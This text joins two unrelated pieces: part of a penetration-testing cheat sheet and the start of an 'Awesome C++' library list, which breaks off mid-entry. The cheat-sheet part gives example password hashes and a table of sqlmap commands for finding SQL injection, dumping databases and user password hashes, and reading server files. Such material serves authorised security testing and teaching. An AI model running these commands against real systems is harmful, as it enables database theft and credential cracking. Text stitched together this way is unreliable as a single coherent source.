<td>SHA-512</td> <td>82a9dda829eb7f8ffe9fbe49e45d47d2dad9<br> 664fbb7adf72492e3c81ebd3e29134d9bc<br> 12212bf83c6840f10e8246b9db54a4<br> 859b7ccd0123d86e5872c1e5082f</td> </tr> <tr> <td>SHA-512 $PASS:$SALT</td> <td>e5c3ede3e49fb86592fb03f471c35ba13e8<br> d89b8ab65142c9a8fdafb635fa2223c24e5<br> 558fd9313e8995019dcbec1fb58414<br> 6b7bb12685c7765fc8c0d51379fd</td> </tr> <tr> <td>SHA-512 $SALT:$PASS</td> <td>976b451818634a1e2acba682da3fd6ef<br> a72adf8a7a08d7939550c244b237c72c7d4236754<br> 4e826c0c83fe5c02f97c0373b6b1<br> 386cc794bf0d21d2df01bb9c08a</td> </tr> <tr> <td>NTLM Hash Example</td> <td>b4b9b02e6f09a9bd760f388b67351e2b</td> </tr> </tbody> </table> <h2>SQLMap Examples</h2> <p>sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</p> <table> <thead> <tr> <th>Command</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>sqlmap -u http://meh.com –forms –batch –crawl=10<br> –cookie=jsessionid=54321 –level=5 –risk=3</td> <td>Automated sqlmap scan</td> </tr> <tr> <td>sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE<br> –level=3 –current-user –current-db –passwords<br> –file-read=”/var/www/blah.php”</td> <td>Targeted sqlmap scan</td> </tr> <tr> <td>sqlmap -u “http://meh.com/meh.php?id=1”<br> –dbms=mysql –tech=U –random-agent –dump</td> <td>Scan url for union + error based injection with mysql backend<br> and use a random user agent + database dump</td> </tr> <tr> <td>sqlmap -o -u “http://meh.com/form/” –forms</td> <td>sqlmap check form for injection</td> </tr> <tr> <td>sqlmap -o -u “http://meh/vuln-form” –forms<br> -D database-name -T users –dump</td> <td>sqlmap dump and crack hashes for table users on database-name.</td> </tr> </tbody> </table>
# Awesome C++ [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) [![Track Awesome List](https://www.trackawesomelist.com/badge.svg)](https://www.trackawesomelist.com/fffaraz/awesome-cpp/) A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny things. Inspired by awesome-... stuff. - [Awesome C++](#awesome-cpp) - [Standard Libraries](#standard-libraries) - [Frameworks](#frameworks) - [Artificial Intelligence](#artificial-intelligence) - [Asynchronous Event Loop](#asynchronous-event-loop) - [Audio](#audio) - [Biology](#biology) - [BitTorrent](#bittorrent) - [Chemistry](#chemistry) - [CLI](#cli) - [Compression](#compression) - [Concurrency](#concurrency) - [Configuration](#configuration) - [Containers](#containers) - [Cryptography](#cryptography) - [CSV](#csv) - [Database](#database) - [Data visualization](#data-visualization) - [Debug](#debug) - [Documentation](#documentation) - [DSP](#dsp) - [Font](#font) - [Game Engine](#game-engine) - [Graph](#graph) - [GUI](#gui) - [Graphics](#graphics) - [Image Processing](#image-processing) - [Internationalization](#internationalization) - [Inter-process communication](#inter-process-communication) - [JSON](#json) - [Logging](#logging) - [Machine Learning](#machine-learning) - [Math](#math) - [Memory Allocation](#memory-allocation) - [Multimedia](#multimedia) - [Networking](#networking) - [PDF](#pdf) - [Physics](#physics) - [Reflection](#reflection) - [Regular Expression](#regular-expression) - [Robotics](#robotics) - [Scientific Computing](#scientific-computing) - [Scripting](#scripting) - [Serialization](#serialization) - [Sorting](#sorting) - [Video](#video) - [Virtual Machines](#virtual-machines) - [Web Application Framework](#web-application-framework) - [XML](#xml) - [Yaml](#yaml) - [Miscellaneous](#miscellaneous) - [Software](#software) - [Compiler](#compiler) - [Online Compiler](#online-compiler) - [Debugger](#debugger) - [Integrated Development Environment](#integrated-development-environment) - [Build Systems](#build-systems) - [Static Code Analysis](#static-code-analysis) - [Coding Style Tools](#coding-style-tools) - [Resources](#resources) - [API Design](#api-design) - [Articles](#articles) - [Books](#books) - [Coding Standards](#coding-standards) - [Coding Style](#coding-style) - [Podcasts](#podcasts) - [Talks](#talks) - [Videos](#videos) - [Websites](#websites) - [Weblogs](#weblogs) - [Other Awesome Projects](#other-awesome-projects) - [Other Awesome Lists](#other-awesome-lists) - [Jobs](#jobs) - [Sponsors](#sponsors) - [Contributing](#contributing) ## Standard Libraries *C++ Standard Library - including STL Containers, STL Algorithm, STL Functional, etc.* * [C++ Standard Library](https://en.wikipedia.org/wiki/C%2B%2B_Standard_Library) - A collection of classes and functions, which are written in the core language and part of the C++ ISO Standard itself. * [Standard Template Library](https://en.wikipedia.org/wiki/Standard_Template_Library) - The Standard Template Library (STL). * [C POSIX library](https://en.wikipedia.org/wiki/C_POSIX_library) - A specification of a C standard library for POSIX systems. * [ISO C++ Standards Committee](https://github.com/cplusplus) - ISO/IEC JTC1/SC22/WG21 - The C++ Standards Committee. [website](http://www.open-std.org/JTC1/SC22/WG21/) * [The GNU C Library](https://www.gnu.org/software/libc/manual) - The purpose of this manual is to tell you how to use the facilities of the GNU C Library. ## Frameworks *C++ generic frameworks and libraries.* * [abseil-cpp](https://github.com/abseil/abseil-cpp) - Abseil C++ Common Libraries. [Apache2] * [Apache C++ Standard Library](http://stdcxx.apache.org/) - STDCXX, A collection of algorithms, containers, iterators, and other fundamental components. [retired] [Apache2] * [APR](http://apr.apache.org/) - Apache Portable Runtime. Another library of cross-platform utility functions. [Apache2] * [ASL](http://stlab.adobe.com/) - Adobe Source Libraries provides peer-reviewed and portable C++ source libraries. [MIT] * [Boost](https://github.com/boostorg) :zap: - A large collection of generic C++ libraries. [Boost] [website](https://www.boost.org) * [BDE](https://github.com/bloomberg/bde) - The BDE Development Environment from Bloomberg Labs. [Apache2] * [C++ Workflow](https://github.com/sogou/workflow) :zap: - C++ Parallel Computing and Asynchronous Networking Engine. [Apache2] * [CGraph](https://github.com/ChunelFeng/CGraph) - A cross-platform DAG framework based on C++ without any 3rd-party. [MIT] * [Cinder](https://libcinder.org/) - A community-developed, free and open source library for professional-quality creative coding. [BSD] * [Coost](https://github.com/idealvin/coost) - A tiny boost library in C++11. [MIT] * [Cxxomfort](http://ryan.gulix.cl/fossil.cgi/cxxomfort/) - A small, header-only library that backports various facilities from more recent C++ Standards to C++03 and later. [MIT] * [Dlib](https://github.com/davisking/dlib) :zap: - A toolkit for making real world machine learning and data analysis applications in C++. [Boost] [website](http://dlib.net/) * [EASTL](https://github.com/electronicarts/EASTL) - Electronic Arts Standard Template Library. [BSD] * [ETL](https://github.com/ETLCPP/etl) - Embedded Template Library. [MIT] * [ffead-cpp](https://github.com/sumeetchhetri/ffead-cpp) - Framework for Enterprise Application Development. [Apache2] * [Folly](https://github.com/facebook/folly) - An open-source C++ library developed and used at Facebook. [Apache2] * [FunctionalPlus](https://github.com/Dobiasd/FunctionalPlus) - Functional Programming Library for C++. Write concise and readable C++ code. [MIT] * [GLib](https://wiki.gnome.org/Projects/GLib) - GLib provides the core application building blocks for libraries and applications written in C. [LGPL] * [JUCE](https://github.com/julianstorer/JUCE) - An all-encompassing C++ class library for developing cross-platform software. [Core-Module: ISC, Rest: GPL2/GPL3/Commercial] [website](http://www.juce.com/) * [Kigs framework](https://github.com/Kigs-framework/kigs) - A free and open source C++ modular multi-purpose cross platform RAD framework. [MIT] [website](https://kigs-framework.org/) * [libPhenom](https://github.com/facebook/libphenom) - libPhenom is an eventing framework for building high performance and high scalability systems in C. [Apache2] * [LibSourcey](https://github.com/sourcey/libsourcey) - C++11 evented IO for real-time video streaming and high performance networking applications. [LGPL] * [LibU](https://github.com/koanlogic/libu) - A multiplatform utility library written in C. [BSD] * [libxutils](https://github.com/kala13x/libxutils) - Simple and yet powerful cross-platform C library providing data structures, algorithms and much more. [MIT] * [Loki](http://loki-lib.sourceforge.net/) - A C++ library of designs, containing flexible implementations of common design patterns and idioms. [MIT] * [MiLi](https://github.com/MariadeAnton/MiLi) - Minimal headers-only C++ Library. [Boost] * [OpenFrameworks](https://github.com/openframeworks/openFrameworks) - A cross platform open source toolkit for creative coding in C++. [MIT] [website](http://www.openframeworks.cc/) * [Qt](https://github.com/qt) :zap: - A cross-platform application and UI framework. [GPL/LGPL/Commercial] [website](https://www.qt.io) * [Reason](http://code.google.com/p/reason/) - A cross platform framework designed to bring the ease of use of Java, .Net, or Python to developers who require the performance and strength of C++. [GPL2] * [ROOT](https://root.cern.ch/) - A set of OO frameworks with all the functionality needed to handle and analyze large amounts of data in a very efficient way. Used at CERN. [LGPL] * [Seastar](https://github.com/scylladb/seastar) - An advanced, open-source C++ framework for high-performance server applications on modern hardware. [Apache-2.0 License] [seastar.io](http://seastar.io/) * [STLport](http://www.stlport.org/) - An exemplary version of STL. [Free] * [STXXL](http://stxxl.sourceforge.net/) - Standard Template Library for Extra Large Data Sets. [Boost] * [tbox](https://github.com/tboox/tbox) - A glib-like multi-platform c library. [Apache2] [website](http://tboox.org/) * [Ultimate++](http://www.ultimatepp.org/) - A C++ cross-platform rapid application development framework. [BSD] * [uSTL](http://msharov.github.io/ustl/) - The small STL library. [MIT] * [Windows Template Library](http://sourceforge.net/projects/wtl/) - A C++ library for developing Windows applications and UI components. [Public] * [Yomm2](https://github.com/jll63/yomm2) - Fast, Orthogonal, Open multi-methods. Supersedes [Yomm11](https://github.com/jll63/yomm11) [Boost] ## Artificial Intelligence * [ANNetGPGPU](https://github.com/ANNetGPGPU/ANNetGPGPU) - A GPU (CUDA) based Artificial Neural Network library. [LGPL] * [btsk](https://github.com/aigamedev/btsk) - Game Behavior Tree Starter Kit. [zlib] * [Evolving Objects](http://eodev.sourceforge.net/) - A template-based, ANSI-C++ evolutionary computation library which helps you to write your own stochastic optimization algorithms insanely fast. [LGPL] * [frugally-deep](https://github.com/Dobiasd/frugally-deep) - Header-only library for using Keras models in C++. [MIT] * [Genann](https://github.com/codeplea/genann) - Simple neural network library in C. [zlib] * [MXNet](https://github.com/apache/incubator-mxnet) - Lightweight, Portable, Flexible Distributed/Mobile Deep Learning with Dynamic, Mutation-aware Dataflow Dep Scheduler; for Python, R, Julia, Scala, Go, Javascript and more. [website](https://mxnet.apache.org) * [PyTorch](https://github.com/pytorch/pytorch) - Tensors and Dynamic neural networks in Python with strong GPU acceleration. [website](https://pytorch.org) * [flashlight](https://github.com/flashlight/flashlight) - Flashlight is a fast, flexible machine learning library written entirely in C++. [BSD] * [Recast/Detour](https://github.com/recastnavigation/recastnavigation) - (3D) Navigation mesh generator and pathfinder, mostly for games. [zlib] * [TensorFlow](https://github.com/tensorflow/tensorflow) - An open source software library for numerical computation using data flow graphs. [Apache] * [oneDNN](https://github.com/oneapi-src/oneDNN) - An open-source cross-platform performance library for deep learning applications. [Apache] [website](https://01.org/onednn) * [CNTK](https://github.com/Microsoft/CNTK) - Microsoft Cognitive Toolkit (CNTK), an open source deep-learning toolkit. [Boost] * [tiny-dnn](https://github.com/tiny-dnn/tiny-dnn) - A header only, dependency-free deep learning framework in C++11. [BSD] * [Veles](https://github.com/Samsung/veles) - Distributed platform for rapid Deep learning application development. [Apache] * [Kaldi](https://github.com/kaldi-asr/kaldi) - Toolkit for speech recognition. [Apache] ## Asynchronous Event Loop * [Asio](https://github.com/chriskohlhoff/asio/) - A cross-platform C++ library for network and low-level I/O programming that provides developers with a consistent asynchronous model using a modern C++ approach. [Boost] [website](http://think-async.com/) * [Boost.Asio](https://github.com/boostorg/asio) - A cross-platform C++ library for network and low-level I/O programming. [Boost] [website](https://boost.org/libs/asio) * [C++ Actor Framework](https://github.com/actor-framework/actor-framework) - An Open Source Implementation of the Actor Model in C++. [BSD-3-Clause] [website](http://actor-framework.org/) * [Ichor](https://github.com/volt-software/ichor) - An event queue which focuses on thread safety and provides dependency injection. [MIT] * [libev](http://libev.schmorp.de/) - A full-featured and high-performance event loop that is loosely modelled after libevent, but without its limitations and bugs. [BSD and GPL] * [libevent](http://libevent.org/) - An event notification library. [BSD] * [libhv](https://github.com/ithewei/libhv) - Cross-platform event loop library. [BSD] * [libuv](https://github.com/libuv/libuv) - Cross-platform asynchronous I/O. [BSD] * [promise-cpp](https://github.com/xhawk18/promise-cpp) - Header only library that implements Promise/A+ standard. [Anti-996] * [uvw](https://github.com/skypjack/uvw) - C++ wrapper for libuv. [MIT] ## Audio *Audio, Sound, Music, Digitized Voice Libraries* * [Aubio](https://github.com/aubio/aubio) - A library for audio and music analysis.[GPL-3.0] [website](https://aubio.org/) * [AudioFile](https://github.com/adamstark/AudioFile) - A simple C++ library for reading and writing audio files. [MIT] * [audioFlux](https://github.com/libAudioFlux/audioFlux) - A C library for audio and music analysis, feature extraction. [MIT] * [dr_libs](https://github.com/mackron/dr_libs) - Single file audio decoding libraries for C and C++. [Unlicense] * [FMOD](http://www.fmod.org/) - An easy to use crossplatform audio engine and audio content creation tool for games. [Free for non-commercial/Commercial] * [KFR](https://www.kfrlib.com/) - Fast, modern C++ DSP framework, FFT, FIR/IIR filters, Sample Rate Conversion. [GPL/Commercial] * [LAME](https://lame.sourceforge.io/using.php) - LAME is a high quality MPEG Audio Layer III (MP3) encoder. [LGPL] * [libsndfile](https://github.com/erikd/libsndfile/) - C library with C++ wrapper for reading and writing files containing sampled sound through one standard library interface. [LGPL-2.1] [website](http://www.mega-nerd.com/libsndfile/) * [libsoundio](https://github.com/andrewrk/libsoundio) - C library for cross-platform real-time audio input and output. [MIT] [website](http://libsound.io/) * [Maximilian](https://github.com/micknoise/Maximilian) - C++ Audio and Music DSP Library. [MIT] * [OpenAL](http://www.openal.org/) - Open Audio Library - A crossplatform audio API. [BSD/LGPL/Commercial] * [miniaudio](https://github.com/mackron/miniaudio) - Single file audio playback and capture library. [Unlicense] [website](https://miniaud.io/) * [ni-media](https://github.com/NativeInstruments/ni-media) - C++ library for reading and writing audio files. [MIT] * [Opus](http://opus-codec.org/) - A totally open, royalty-free, highly versatile audio codec. [BSD] * [PortAudio](http://www.portaudio.com/) - PortAudio is a free, cross-platform, open-source, audio I/O library. [MIT] * [rnnoise](https://github.com/xiph/rnnoise) - Recurrent neural network for audio noise reduction. [BSD-3-Clause] * [SELA](https://github.com/sahaRatul/sela) - SimplE Lossless Audio. [MIT] * [SoLoud](https://github.com/jarikomppa/soloud) - Easy, portable audio engine for games. [zlib] * [Speex](http://www.speex.org/) - A free codec for free speech. Obsoleted by Opus. [BSD] * [Tonic](https://github.com/TonicAudio/Tonic) - Easy and efficient audio synthesis in C++. [Unlicense] * [Vorbis](http://xiph.org/vorbis/) - Ogg Vorbis is a fully open, non-proprietary, patent-and-royalty-free, general-purpose compressed audio format. [BSD] * [minimp3](https://github.com/lieff/minimp3) - Public domain, header-only MP3 decoder with clean-room implementation. [CC0] * [Verovio](https://github.com/rism-ch/verovio) - Verovio is a fast and lightweight music notation engraving library. [LGPL] [website](https://www.verovio.org) * [Wav2Letter++](https://github.com/facebookresearch/wav2letter/) - Public domain, a fast open source speech processing toolkit written entirely in C++ and uses the ArrayFire tensor library and the flashlight machine learning library for maximum efficiency. [BSD] ## Biology *Bioinformatics, Genomics, Biotech* * [BioC++](http://biocpp.sourceforge.net/) - C++ Computational Libraries for Bioinformatics. [BSD] * [Chaste](http://www.cs.ox.ac.uk/chaste/) - An open source C++ library for the computational simulation of mathematical models developed for physiology and biology. [BSD] * [libsequence](http://molpopgen.github.io/libsequence/) - A C++ library for representing and analyzing population genetics data. [GPL] * [SeqAn](http://www.seqan.de/) - Algorithms and data structures for the analysis of sequences with the focus on biological data. [BSD/3-clause] * [Vcflib](https://github.com/ekg/vcflib) - A C++ library for parsing and manipulating VCF files. [MIT] * [Wham](https://github.com/zeeev/wham) - Structural variants (SVs) in Genomes by directly applying association tests to BAM files. [MIT] ## BitTorrent * [jech/dht](https://github.com/jech/dht) - BitTorrent DHT library in C. [MIT] * [libtorrent](https://github.com/arvidn/libtorrent) (a.k.a. libtorrent-rasterbar) - An efficient feature complete C++ bittorrent implementation. [BSD] * [LibTorrent](https://github.com/rakshasa/libtorrent) (a.k.a. libtorrent-rakshasa) - BitTorrent library. [GPL] * [libutp](https://github.com/bittorrent/libutp) - uTorrent Transport Protocol library. [MIT] ## Chemistry *Chemistry, Quantum Chemistry, Solid-State Chemistry/Physics, Geochemistry, Biochemistry* * [d-SEAMS](https://github.com/d-SEAMS/seams-core) - A molecular dynamics trajectory analysis engine in C++ and Lua with Nix. It is an acronym for Deferred Structural Elucidation Analysis for Molecular Simulations. [GPL] [website](https://dseams.info) * [gromacs](https://github.com/gromacs/gromacs) - A message-passing parallel molecular dynamics implementation. [GPL] [website](http://www.gromacs.org) * [Reaktoro](https://github.com/reaktoro/reaktoro) - A computational framework in C++ and Python for modeling chemically reactive systems. [LGPL] [website](https://reaktoro.org) * [LAMMPS](https://github.com/lammps/lammps) - A classical molecular dynamics code with a focus on materials modeling. It's an acronym for Large-scale Atomic/Molecular Massively Parallel Simulator. [GPL] [website](https://lammps.sandia.gov/) * [MADNESS](https://github.com/m-a-d-n-e-s-s/madness) - Multiresolution Adaptive Numerical Environment for Scientific Simulation. [GPL] [website](https://github.com/m-a-d-n-e-s-s/madness) * [MPQC](https://github.com/ValeevGroup/mpqc) - The Massively Parallel Quantum Chemistry program, MPQC, computes properties of atoms and molecules from first principles using the time independent Schrödinger equation. [GPL] [website](https://mpqc.org/) * [ORCA](https://en.wikipedia.org/wiki/ORCA_(quantum_chemistry_program)) - An ab initio quantum chemistry program package that contains modern electronic structure methods. [Academic] [website](https://orcaforum.kofo.mpg.de/) * [Psi](https://github.com/psi4/psi4) - An ab initio computational chemistry package. [GPL] [website](https://psicode.org/) ## CLI *Console/Terminal User Interface, Command Line Interface* * [Argh!](https://github.com/adishavit/argh) - A minimalist, frustration-free, header-only argument handler. [BSD] * [Taywee/args](https://github.com/taywee/args) - A simple header-only C++ argument parser library. [MIT] * [Boost.Program_options](https://github.com/boostorg/program_options) - A library to obtain program options via conventional methods such as command line and config file. [Boost] [website](https://boost.org/libs/program_options) * [Clara](https://github.com/catchorg/Clara) - A simple to use, composable, command line parser for C++ 11 and beyond. [Boost] * [cli](https://github.com/daniele77/cli) - A cross-platform header only C++14 library for interactive command line interfaces (Cisco style). [Boost] * [CLI11](https://github.com/CLIUtils/CLI11) - Header only single or multi-file C++11 library for simple and advanced CLI parsing. [BSD] * [clipp](https://github.com/muellan/clipp) - Easy to use, powerful and expressive command line argument handling for C++11/14/17 contained in a single header file. [MIT] * [jarro2783/cxxopts](https://github.com/jarro2783/cxxopts) - Lightweight C++ command line option parser. [MIT] * [docopt.cpp](https://github.com/docopt/docopt.cpp) - A library to generate option parser from docstring. [MIT/Boost] * [FINAL CUT](https://github.com/gansm/finalcut) - Library for creating terminal applications with text-based widgets. [LGPL] * [gflags](https://gflags.github.io/gflags/) - Commandline flags module for C++. [BSD] * [indicators](https://github.com/p-ranav/indicators/) - Activity indicators for Modern C++. [MIT] * [linenoise](https://github.com/antirez/linenoise) - A small self-contained alternative to readline and libedit. [BSD-2-Clause] * [linenoise-ng](https://github.com/arangodb/linenoise-ng) - A small, portable GNU readline replacement for Linux, Windows and MacOS which is capable of handling UTF-8 characters. [BSD] * [Lyra](https://github.com/bfgroup/Lyra) - A simple to use, composable, command line parser for C++ 11 and beyond. [Boost] * [Ncurses](http://invisible-island.net/ncurses/) - A terminal user interface. [MIT] * [oof](https://github.com/s9w/oof) - Convenient, high-performance RGB color and position control for console output. [MIT] * [PDCurses](https://github.com/wmcbrine/PDCurses) - Public domain curses library with both source code and pre-compiled library available. [PublicDomain] * [popl](https://github.com/badaix/popl) - A single-header templated command line arguments and ini file parser for C++ 11 and beyond. [MIT] * [replxx](https://github.com/AmokHuginnsson/replxx) - A readline and libedit replacement that supports UTF-8, syntax highlighting, hints, works on Unix and Windows. [BSD] * [tabulate](https://github.com/p-ranav/tabulate) - Table Maker for Modern C++. [MIT] * [TCLAP](http://tclap.sourceforge.net) - A mature, stable and feature-rich library for defining and accessing command line arguments in ANSI C++. [MIT] * [termbox](https://github.com/nsf/termbox) - A C library for writing text-based user interfaces. [MIT] * [cpp-terminal](https://github.com/jupyter-xeus/cpp-terminal) - Small header only C++ library for writing multiplatform terminal applications. [MIT] * [FTXUI](https://github.com/ArthurSonzogni/FTXUI) - C++ Functional Terminal User Interface. [MIT] * [imtui](https://github.com/ggerganov/imtui) - Immediate Mode Text-based User Interface. [MIT] ## Compression *Compression and Archiving Libraries* * [bit7z](https://github.com/rikyoz/bit7z) - A C++ static library offering a clean and simple interface to the 7-zip DLLs. [GPLv2] * [Brotli](https://github.com/google/brotli) - Brotli compression format. Developed by Google. [MIT] * [bzip2](http://www.bzip.org/) - A freely available, patent free, high-quality data compressor. [BSD] * [bzip3](https://github.com/kspalaiologos/bzip3) - A better and stronger spiritual successor to BZip2. [LGPL] * [FiniteStateEntropy](https://github.com/Cyan4973/FiniteStateEntropy) - New generation entropy codecs : Finite State Entropy and Huff0. * [PhysicsFS](https://icculus.org/physfs/) - A library to provide abstract access to various archives. It is intended for use in video games, and the design was somewhat inspired by Quake 3's file subsystem. [zlib] * [KArchive](https://api.kde.org/frameworks/karchive/html/index.html) - A library for creating, reading, writing and manipulating file archives like zip and tar. It also provides transparent compression and decompression of data, using formats like gzip, via a subclass of QIODevice. [LGPL] * [libarchive](https://github.com/libarchive/libarchive) - Multi-format archive and compression library. [New BSD] [website](http://www.libarchive.org/) * [LZ4](https://github.com/lz4/lz4) - Extremely Fast Compression algorithm. [BSD] [website](http://www.lz4.org/) * [LZFSE](https://github.com/lzfse/lzfse) - LZFSE compression library and command line tool. Developed by Apple. * [LZHAM](https://code.google.com/p/lzham/) - Lossless data compression library with a compression ratio similar to LZMA but with much faster decompression. [BSD] * [LZMA](https://sourceforge.net/projects/sevenzip/files/7-Zip) :zap: - The default and general compression method of 7z format. [PublicDomain] [website](https://www.7-zip.org) * [LZMAT](http://www.matcode.com/lzmat.htm) - An extremely fast real-time lossless data compression library. [GPL] * [miniz](https://github.com/richgel999/miniz) - Single C source file Deflate/Inflate compression library with zlib-compatible API, ZIP archive reading/writing, PNG writing. [MIT] * [Minizip](https://github.com/nmoinvaz/minizip) - Zlib with latest bug fixes that supports PKWARE disk spanning, AES encryption, and IO buffering. [zlib] * [smaz](https://github.com/antirez/smaz) - Small strings compression library. [BSD] * [Snappy](https://google.github.io/snappy/) - A fast compressor/decompressor. [BSD] * [ZLib](http://zlib.net/) - A very compact compression library for data streams. [zlib] * [zlib-ng](https://github.com/Dead2/zlib-ng) - zlib for the "next generation" systems. Drop-In replacement with some serious optimizations. [zlib] * [zstd](https://github.com/facebook/zstd) - Zstandard - Fast real-time compression algorithm. Developed by Facebook. [BSD] * [ZZIPlib](http://zziplib.sourceforge.net/) - Provides read access on ZIP-archives. [MPL/LGPL] ## Concurrency *Concurrency and Multithreading* * [alpaka](https://github.com/ComputationalRadiationPhysics/alpaka) - Abstraction library for parallel kernel acceleration. [LGPLv3+] * [ArrayFire](https://github.com/arrayfire/arrayfire) - A general purpose GPU library. [BSD] * [Async++](https://github.com/Amanieu/asyncplusplus) - A lightweight concurrency framework for C++11, inspired by the Microsoft PPL library and the N3428 C++ standard proposal. [MIT] * [Boost.Compute](https://github.com/boostorg/compute) - A C++ GPU Computing Library for OpenCL. [Boost] [website](https://boost.org/libs/compute) * [Bolt](https://github.com/HSA-Libraries/Bolt) - A C++ template library optimized for GPUs. [Apache2] * [ck](https://github.com/concurrencykit/ck) - Concurrency primitives, safe memory reclamation mechanisms and non-blocking data structures. [BSD] * [concurrentqueue](https://github.com/cameron314/concurrentqueue) - A fast multi-producer, multi-consumer lock-free concurrent queue for C++11. [BSD,Boost] * [Cpp-Taskflow](https://github.com/cpp-taskflow/cpp-taskflow) - Fast C++ Parallel Programming with Task Dependencies. [MIT] * [CUB](https://github.com/NVlabs/cub) - CUB provides state-of-the-art, reusable software components for every layer of the CUDA programming mode. [New BSD] * [cuda-api-wrappers](https://github.com/eyalroz/cuda-api-wrappers) - Lightweight, Modern-C++ wrappers for the CUDA GPU programming runtime API. [BSD] * [cupla](https://github.com/ComputationalRadiationPhysics/cupla) - C++ API to run CUDA/C++ on OpenMP, Threads, TBB, ... through Alpaka. [LGPLv3+] * [C++React](https://github.com/schlangster/cpp.react) - A reactive programming library for C++11. [Boost] * [FiberTaskingLib](https://github.com/RichieSams/FiberTaskingLib) - Task-based multi-threading library that supports task graphs with arbitrary dependencies. [Apache] * [HPX](https://github.com/STEllAR-GROUP/hpx/) - A general purpose C++ runtime system for parallel and distributed applications of any scale. [Boost] * [Intel Games Task Scheduler](https://github.com/GameTechDev/GTS-GamesTaskScheduler) - A task scheduling framework designed for the needs of game developers. [MIT] * [Intel Parallel STL](https://github.com/intel/parallelstl) - Intel® implementation of C++17 STL for C++11 and above. [Apache2] * [Intel TBB](https://www.threadingbuildingblocks.org/) - Intel® Threading Building Blocks. [Apache2] * [junction](https://github.com/preshing/junction) - A library of concurrent data structures in C++. [BSD] * [Kokkos](https://github.com/kokkos/kokkos) - A performance portable programming model for parallel execution and memory abstraction. [BSD] * [libcds](https://github.com/khizmax/libcds) - A C++ library of Concurrent Data Structures. [BSD] * [Libclsph](https://github.com/libclsph/libclsph) - An OpenCL based GPU accelerated SPH fluid simulation library. [MIT] * [libdill](https://github.com/sustrik/libdill/) - Introduces structured concurrency in C. [MIT] * [libdispatch](https://github.com/apple/swift-corelibs-libdispatch) - Grand Central Dispatch (GCD), developed by Apple Inc., is a task parallelism technology based on the thread pool pattern. libdispatch is a library that provides the implementation of GCD's services. [Apache-2.0] [website](https://apple.github.io/swift-corelibs-libdispatch/) * [libmill](https://github.com/sustrik/libmill/) - Introduces Go-style concurrency in C. [MIT] * [marl](https://github.com/google/marl) - Marl is a hybrid thread / fiber task scheduler written in C++ 11. [Apache-2.0] * [moderngpu](https://github.com/moderngpu/moderngpu) - moderngpu is a productivity library for general-purpose computing on GPUs. It is a header-only C++ library written for CUDA. The unique value of the library is in its accelerated primitives for solving irregularly parallel problems. [FreeBSD & Copyright, Sean Baxter] * [NCCL](https://github.com/NVIDIA/nccl) - Optimized primitives for collective multi-GPU communication. [BSD] * [OpenCL](https://www.khronos.org/opencl/) - The open standard for parallel programming of heterogeneous systems. * [OpenMP](http://openmp.org/) - The OpenMP API. * [rotor](https://github.com/basiliscos/cpp-rotor) - Event loop friendly C++ actor micro framework. [MIT] * [SObjectizer](https://github.com/Stiffstream/sobjectizer) - An implementation of Actor, Publish-Subscribe, and CSP models in one rather small C++ framework. [BSD-3-Clause] * [Quantum](https://github.com/bloomberg/quantum) - A powerful C++ coroutine dispatcher framework built on top of [Boost.Coroutine2](https://boost.org/libs/coroutine2). * [RaftLib](http://raftlib.io/) - The RaftLib C++ library, streaming/dataflow concurrency via C++ iostream-like operators. [Apache2] * [readerwriterqueue](https://github.com/cameron314/readerwriterqueue) - A fast single-producer, single-consumer lock-free queue for C++. [BSD] * [stdgpu](https://github.com/stotko/stdgpu) - Efficient STL-like Data Structures on the GPU. [Apache2] * [Thrust](http://thrust.github.io/) - A parallel algorithms library which resembles the C++ Standard Template Library (STL). [Apache2] * [transwarp](https://github.com/bloomen/transwarp) - A header-only C++ library for task concurrency. [MIT] * [VexCL](https://github.com/ddemidov/vexcl) - A C++ vector expression template library for OpenCL/CUDA. [MIT] * [STAPL](http://parasol-lab.gitlab.io/stapl-home/) - A C++ parallel programming framework designed to work on both shared and distributed memory parallel computers. [BSD] * [concurrencpp](https://github.com/David-Haim/concurrencpp) - A general concurrency library containing tasks, executors, timers and C++20 coroutines to rule them all. ## Configuration *Configuration files, INI files* * [inifile-cpp](https://github.com/Rookfighter/inifile-cpp) - A header-only and easy to use Ini file parser for C++. [MIT] * [inih](https://github.com/benhoyt/inih) - Simple .INI file parser in C, good for embedded systems. [BSD-3-Clause] * [inih](https://github.com/jtilly/inih) - Single header only C++ version of [inih](https://github.com/benhoyt/inih). [BSD-3-Clause] * [ini-cpp](https://github.com/SSARCandy/ini-cpp) - Single header only C++ version, with some handy read/write interface, extend from [inih](https://github.com/benhoyt/inih). [BSD-3-Clause] [website](https://ssarcandy.tw/ini-cpp/index.html) * [iniparser](https://github.com/ndevilla/iniparser) - INI file parser. [MIT]* * [inipp](https://github.com/mcmtroffaes/inipp) - Simple header-only C++ ini parser and generator. [MIT] * [libconfig](https://github.com/hyperrealm/libconfig) - C, C++ library for processing structured configuration files. [LGPL-2.1] [website](https://hyperrealm.github.io/libconfig/) * [libconfuse](https://github.com/martinh/libconfuse) - Small configuration file parser library for C. [ISC] * [simpleini](https://github.com/brofield/simpleini) - Cross-platform C++ library providing a simple API to read and write INI-style configuration files. [MIT] * [toml++](https://github.com/marzer/tomlplusplus) - Header-only TOML parser and serializer for C++17 and later. [MIT] [website](https://marzer.github.io/tomlplusplus/) ## Containers * [C++ B-tree](https://github.com/algorithm-ninja/cpp-btree) - A template library that implements ordered in-memory containers based on a B-tree data structure. [Apache2] * [Colony](https://github.com/mattreecebentley/plf_colony) - An unordered "bag"-type container which outperforms std containers in high-modification scenarios while maintaining permanent pointers to non-erased elements regardless of insertion/erasure. [zLib] [website](http://www.plflib.org/colony.htm) * [dynamic_bitset](https://github.com/pinam45/dynamic_bitset) - A C++17 header-only dynamic bitset. [MIT] * [Hashmaps](https://github.com/goossaert/hashmap) - Implementation of open addressing hash table algorithms in C++. [MIT] * [Hopscotch map](https://github.com/Tessil/hopscotch-map) - A fast header-only hash map which uses hopscotch hashing for collisions resolution. [MIT] * [LSHBOX](https://github.com/RSIA-LIESMARS-WHU/LSHBOX) - A c++ toolbox of locality-sensitive hashing (LSH), provides several popular LSH algorithms, also support Python and MATLAB. [GPL] * 